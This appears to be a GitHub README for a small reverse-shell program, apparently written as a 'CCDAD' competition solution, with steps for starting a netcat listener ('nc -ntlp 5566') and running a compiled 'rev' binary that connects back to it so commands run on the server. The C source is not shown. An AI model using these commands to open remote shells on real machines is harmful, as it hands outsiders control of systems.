Skip to content

Latest commit

 

History

History
16 lines (9 loc) · 742 Bytes

README.md

File metadata and controls

16 lines (9 loc) · 742 Bytes

reverse-shell

This is our CCDAD soltion ,coded by me to make a reverse shell between the cuda server machine at the administration and the local clients hosts !

1 ) open a netcat server from you local client machine :

nc -ntlp 5566

2 ) make a connection from the server-host ,, when i compiled my "rev.c" file , i took in parameter 2 args ! [server addr & the port to bind the connection] :

./rev @your_machine_ip 5566

3 ) run any command from the client machine and the result will be executed from the server very quickly , enjoy the result !

image